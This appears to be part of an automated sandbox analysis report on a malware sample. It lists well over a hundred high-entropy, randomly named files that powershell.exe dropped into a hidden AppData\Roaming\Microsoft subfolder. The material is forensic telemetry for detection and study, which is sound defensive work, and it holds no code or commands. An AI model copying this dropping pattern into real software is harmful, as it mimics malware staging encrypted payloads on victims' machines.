                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\MsbYozWAJjl.JjkUaLCloqZWPyRrV entropy: 7.99858125663Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\vWrcOxIVHuZie.sAUdchJQICyYnHRN entropy: 7.99878832906Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\JtxafTOLCmGpXon.LuSVrUEzvH entropy: 7.99847710892Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\xZriAtTWvpMqs.XszfobHxFKjBGr entropy: 7.99865516318Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\GXbeLHsoBuP.PKFXbzfwHh entropy: 7.99850526231Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\XvAsEkwdxBRhWUocIS.jnYUgzbqMFXc entropy: 7.9976698792Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\KPLJQWVbrwdC.ZyTduYaMxjG entropy: 7.99875464852Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\BVKszQfclvtGPJCoF.pSkYKXlrvO entropy: 7.998585273Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\ACDSRYjHaJFqblvp.QmpEytPRainlJ entropy: 7.99821517525Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\IgkbYrEeqtUHAWB.oveGZKBsrXjnqkgWlF entropy: 7.99831188932Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\aXZEnQmNxzMJRpYObw.RenMfXQBmwdz entropy: 7.99888811394Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\JmgZUkCGOnwBtYK.caxjFATNnCMOJfIuB entropy: 7.99904549052Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\jfVoIqeklhQztdDpWGm.pvrjMiyImKqN entropy: 7.99892330122Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\olyGLuEsqpXQOTKD.rRPQajxdwK entropy: 7.99753329164Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\jtOReEHivLrk.ucwhOsZipDFfrSMQX entropy: 7.99747739202Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\qyOtVvYHfEwSkJiaZ.NWtnorOhiL entropy: 7.99896279717Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\MjVTXQPhYeBZrGqmbyx.AEZcBgUzIlGaLhdNRMD entropy: 7.99883019Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\WmkObYTAauDCZHnGQy.IPVXCLREhywujd entropy: 7.99785594343Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\JhzcXlaPvHxmyw.TRmXshlKrzvDGiBycP entropy: 7.99905592882Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\yicVjkbxqXsEHlhOp.FHXvtRKNqugc entropy: 7.99836639126Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\RIDwqQlOShWbB.DbIqQNkpiX entropy: 7.99860466208Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\SZEwUsrtgzTLq.IKJoYcWZNqjmy entropy: 7.998522771Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\DcJKGzsLoUHwdX.RENXkbpjPcdVDF entropy: 7.99822704815Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\dyLVtBHlIAYSxpEgz.MHPzriKYueyCQ entropy: 7.99776993949Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\LJznrKxpyev.SVONxUmwgskphGZndz entropy: 7.99903385566Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\WNpCtncjMmgZzh.NpdiSJRDag entropy: 7.99763526637Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\pHrCdQLUzWDGOEcNsh.AiCapRLtkEcjQPrFHw entropy: 7.99711810914Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\baYIzxdoZBShnFusUW.SxgkZUwfLIGEiFq entropy: 7.99882584449Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\DUziVQlMtBASd.PcgpHaRTfDKrVzU entropy: 7.99899142285Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\FiqrYmjEVZDB.XrINmGLDsli entropy: 7.99599708355Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\MzQXnKpVhcwFJ.MjcskRTKCtFdzU entropy: 7.99733399566Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\BSjgNxXywaEUizpAM.TdmaLypxJivWSOF entropy: 7.99894621691Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\LaiGpcVSKO.fQkenRdrZDxuIm entropy: 7.99903751415Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\PhBMnijfgvzeWFCyu.LXQnKvNVIeqRft entropy: 7.99903839306Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\rtMpcCmVYPUATdu.xCWtzoNIml entropy: 7.99823329987Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\pUOKADnHErWscxtiIF.xgGiJHEyhOkR entropy: 7.99907372235Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\EUotKfksDBGZyH.nbeMulNAgGh entropy: 7.99878346073Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\eFAuURICmGWxTJhZ.rANdkeWhLaMIPsz entropy: 7.99830783081Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\CSlvxtifgyNDuO.JZixNhldfnGusteFKL entropy: 7.99714123126Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\jRTFwtHxZzfQk.JIZsoypMCETBGXlh entropy: 7.99888433791Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\ZruqUQNTAMoJiEPvgbj.TQjvYIWgdJHxl entropy: 7.99877371959Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\LyNkQoObcYpGBvaK.CIRkbJFwWdEaj entropy: 7.99852675162Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\ZSQcNEOCztejdm.quGefcAYyXgDSot entropy: 7.99763458544Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\jfdFmxnYhrLDZtHXb.gPIvndFeMAjyOsxLNz entropy: 7.9989281105Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\PbIDenfGQKx.zElKnPYTdymqjU entropy: 7.99841444447Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\GdEokeVIwBjhLc.nMRKpxCQFBdZcfXirWN entropy: 7.99891312914Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\yApgcBWNRek.hNoCKMdHIFbWsV entropy: 7.99775434701Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\VHuBdTtSOiYELFrwZDv.jhfZQXHGognVTq entropy: 7.99888203305Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\qUbmiKZveG.gjMlKXVyDWGFETUJ entropy: 7.9990548714Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\HguaokTAjUxvfBhViR.LoIMASDzvOQmCVFjgxt entropy: 7.99911144811Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\abKgFMrHtlPdVuRfCD.rKbtqsNWCpDvMlnmgAR entropy: 7.99881358251Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\hNzakweXpOnRr.ZUVyXawsiqSo entropy: 7.99852405792Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\AEUqJVPnvMdHG.jhaPgeFzLwZTGcsA entropy: 7.99808947647Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\DkxNFlieKuHW.CqBZlQiGyMYmR entropy: 7.99887809143Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\XdMowcJHIlpDuhL.gVBaQuUhMYIqnFTzxWm entropy: 7.998994609Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\jayVmLblhkc.VAhdWSvapN entropy: 7.99877636395Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\xqZFGPobdYlzRJrhm.TaMrvmsbdLucUY entropy: 7.99817739929Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\oqPfYvAlZLiCatc.UlXcqgCxzwSZjNJ entropy: 7.99884404291Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\mOypzjQubiL.DwTnpEFAXkBIs entropy: 7.99817341804Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\RAswJiTFDGOWcQ.UQAOiPrXmWVhMIs entropy: 7.99795377091Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\fJNzeMPqlHuCXwU.uHgyXIeMqWjpVmLx entropy: 7.99823720582Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\fIFzstWXGVUKqZ.vZQDfGTWLkhCIAbi entropy: 7.99760830842Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\BDApiSCOqv.dNxUVZSbDsIpYt entropy: 7.99903572395Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\mfVTGazKyhAXtCsEn.VSybpexCERAwcY entropy: 7.99896611071Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\DpMsTegbJVc.gQhcHOMuET entropy: 7.99831789331Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\VLUinDlmkaIWF.YFrIpXlSVUzvPBRmA entropy: 7.99905152811Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\jdFnskeygVvUmMCB.FxcvjClqLJwMuZR entropy: 7.9987923596Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\WQiMoDsnytOzVGj.ExTuylLpNoadkj entropy: 7.99784944371Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\QkNpehbFPBTqcWHD.NeoCKXbxqvtHSyVgM entropy: 7.99829792551Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\tAGKNjVqhTwEb.FakNjwdlpGcnJOb entropy: 7.99711123808Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\uVhGKWRtUvIMNjdJqF.cejYkFwlDVmxGNdCX entropy: 7.99883837784Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\GRQAtexpHVTru.NtlZsKHiDSEnvuQ entropy: 7.99862076797Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\bfJvuyYTrXUgLHFiI.mgZFSEtpBiPd entropy: 7.99892325714Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\EXzGhdsfHZg.lnIjRsvoNHPMOmct entropy: 7.99899679412Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\LuXjgMAUnYZmoxRvp.zcLpVkReTBiDx entropy: 7.99802203684Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\tUfqeDLJwTcys.PElvMqFBka entropy: 7.9989439474Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\uAgJRrVTxiskym.yEHDLwPJXlWfRjTkUZh entropy: 7.99649854408Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\aAKldTqByI.HYTkiUoQzp entropy: 7.99674700451Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\krqIJEOnjTWS.rDWMREvyASFjXIa entropy: 7.99894859319Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\oVvsglHIGE.ctNTahrQzfFRP entropy: 7.99684129629Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\PhpTdsaYUALNiFDIwG.JpUwWdCOQqnhTMXxgbi entropy: 7.9974575038Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\QbsAxtYzPFaEySJf.kQirKnpDRZz entropy: 7.9987582428Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\qtvATYdjXSFIy.HCenubryVZ entropy: 7.99849908371Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\MvdjTgbEaNoiscGDqtn.WONSgaonGDEziy entropy: 7.99829208499Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\NzJhdaGvYQIMCWXyVo.abCQEyeiskzcHNr entropy: 7.9988726466Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\EfabHONusAFd.OcSYDufXLtTabRBNKhZ entropy: 7.99722233568Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\diZbzOSoXpn.yHmFnNkjUBgPV entropy: 7.99876712458Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\FoxdBJZvjzOnE.jYgZzfUpAWbcQILqnJk entropy: 7.99641925106Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\NsDTEAkUtyzhBJpa.YBGdolRunAaDWCNk entropy: 7.99753019016Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\anGipsDqgQuNW.YRCflarIkSXmUFcz entropy: 7.9967665665Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\qwNzstjZcGXUn.xSqkTQWuKelAaUpHJL entropy: 7.99853562108Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\EoeGVRwyKBasI.fwPjkDqioW entropy: 7.99826657456Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\kemKqGFByCbYziINd.PmYSHMGxVyuiF entropy: 7.99887877818Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\vSUOMWuGQYjsqoJ.WDPZrHmCNUlxvB entropy: 7.99905545597Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\RwXrMTAiyahtEd.XyCGmHiwnWlMOA entropy: 7.99915699654Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\lsZtIjvPLeTFONEYoR.QlrbLyCigOvGY entropy: 7.99912735144Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\PFeMhnqZuxdjwLs.FwsfCuyJHi entropy: 7.9988958976Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\lCBidQIwcZav.zNnsXvMAfcB entropy: 7.99900450167Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\yKhcmtGOVHQz.kGhaLzHnKDUvPTgdRm entropy: 7.99711389368Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\fJvwzhltKMWAPUDZOq.uBnMoxHGwFJATN entropy: 7.99813299139Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\DaBuFCXkip.xlpKmzwdQWNfPJ entropy: 7.99727737475Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\dhkaCMvToniNXOjyUze.OnSfPARMCgBeWvsixK entropy: 7.99731686826Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\fCrLagBDxmWXKsNZ.CFTfLJWDqKrvVRpeuI entropy: 7.99877236563Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\EeGqagumFA.AEtGIWkRbQPrYxHNF entropy: 7.99859448439Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\EOgDvVdwRyGq.AGCtoqsYRm entropy: 7.99891315706Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\fpAKDIlwxYQ.gWBVKfXIPENehRxkt entropy: 7.99844543031Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\AGLbdnliVrfmDtxBhzv.uOqxCwYEIdphnH entropy: 7.99652385717Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\nNsJXqaRkFQIVh.repMtLEGluna entropy: 7.9981037189Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\xUfXtzWvinO.cgBHhwNMiYqJ entropy: 7.99850960272Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\yXGQHJUTtaZwDsgPK.etYhpLgwsBPzWIdG entropy: 7.99712741481Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\uPsdWGIbQqVpezZJm.uTXiLqmghdeYBKlk entropy: 7.99730619878Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\LnDTWobsjHC.xTrXzAtEpWvI entropy: 7.99908522484Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\NwpDsZzxlvWftkb.GPjxFwVuMq entropy: 7.9968363632Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\gawkzfVWJebPKtO.qVfZEzLrwWFPKXuBk entropy: 7.99882710841Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\lIxrMbusnHJcBoC.xQYIbOmaVzGljUAtpi entropy: 7.99855448718Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\lZnrDvVxOWKwa.CtrIMSdDyULzsJFV entropy: 7.99905964163Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\oxDHGkPWXzBOvitS.jEBzVfvaCWy entropy: 7.99799970882Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\djYBXphMPa.UPBOWgXhIwqTuAxGo entropy: 7.99771937889Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\bApIDQShGjqdlWw.naKDegqTjLCPOGiBU entropy: 7.99837587586Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\izvsHgjKaODwlLAe.BIinjAgYuOvcbrRhE entropy: 7.999066186Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\kZpiRdlxGE.oLGAmQKIJEOC entropy: 7.99853203002Jump to dropped file
